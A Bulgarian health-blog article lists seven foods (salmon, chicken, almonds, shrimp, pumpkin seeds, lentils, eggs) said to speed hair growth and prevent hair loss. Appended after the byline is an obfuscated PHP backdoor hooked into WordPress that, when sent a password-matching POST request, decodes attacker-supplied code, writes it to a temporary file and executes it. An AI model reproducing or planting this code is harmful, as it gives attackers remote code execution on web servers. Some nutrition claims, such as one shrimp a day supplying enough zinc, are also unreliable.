7 храни срещу косопад и за растеж на косата | Косопад

7 храни срещу косопад и за растеж на косата

kosopad

Ако искате косата ви да расте по- бързо, обърнете внимание на храненето си. Може именно там да се корени проблема.

Ето 7 храни, които се полезни за ускоряване растежа на косата:

1. Сьомга. Богата е на омега- 3 мазнини, вещество, което подсилва фоликулите и стимулира растежа на косата. Различни изследвания показват, че редовната консумация на мастни киселини намаляват телогенния период, т.е., фазата на покой на фоликулите след катагенния. Това означава, че омега- 3 мазнините стимулират растежа. Освен това, сьомгата е богата на витамини В 12 и желязо, които също са много полезни за косата.
2. Пилешко месо. Богато е на животински протеин, който е много важен за производството на кератин – веществото, което изгражда 80% от косъма. Ако стараме от дефицит на протеини за 2-3 месеца, косата спира да расте с нормалното си темпо и настъпва косопад.

bademi
3. Бадеми. Богати са на витамин Е, който активира растежа на косата и я заздравява. Достатъчни са 20 бадема дневно, за да си набавим 70% от препоръчителната дневна доза от този витамин. Освен това, бадемите са богати и на други вещества, полезни за косата – биотин, мастни киселини и витамини от В групата.
4. Скариди. Те са изключително богати на цинк, който помага на косата да расте по- бързо и да има блясък. Достатъчна е и една скарида дневно, за да си набавим необходимото количество цинк. Ако не ги обичате или не са ви достъпни, можете да ги заместите с: жито, черен дроб, свинско, телешко.
5. Тиквени семки. Богати са на витамините от В група. Идеални са за растежа на косата. За да се предпазите от косопада, трябва да включите олио от тиква.
6. Леща. Съдържа голямо количество желязо. Порция леща ни осигурява половината от необходимото количество от този минерал. Богата е също и на цинк.
7. Яйце. Сред най- богатите на протеини храни. Съдържа и значително количество В 12.

17. май 2017 18:22:56 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}